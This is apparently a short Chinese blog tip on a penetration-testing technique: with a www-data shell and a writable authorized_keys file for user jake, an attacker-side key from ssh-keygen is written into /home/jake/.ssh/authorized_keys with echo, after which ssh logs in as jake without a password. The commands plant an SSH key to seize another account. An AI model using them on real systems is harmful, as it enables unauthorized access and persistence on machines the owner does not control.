方法背景:假如以www-data的身份登入,想切换至jake用户,且发现jake的ssh公钥文件可以修改,则此法有效
一般用户的公钥文件是在/home目录下的
例如:
/home/jake/.ssh/authorized_keys
然后可以在本地机上生成当前本地用户的公钥:
ssh-keygen -t rsa
生成后把那一大段的文字复制,导入到目标机的用户公钥里,例如:
AAAAB3NzaC[REDACTED]+m7pk= kali@kali
echo "ssh-rsa AAAAB3NzaC[REDACTED]+m7pk= kali@kali" > /home/jake/.ssh/authorized_keys
最后在本地机上登录即可,无需输入jake的密码:
ssh jake@target_ip
标签:jake,AAAAB3NzaC,主机,公钥,ssh,kali,home From: https://www.cnblogs.com/jhinjax/p/17110285.html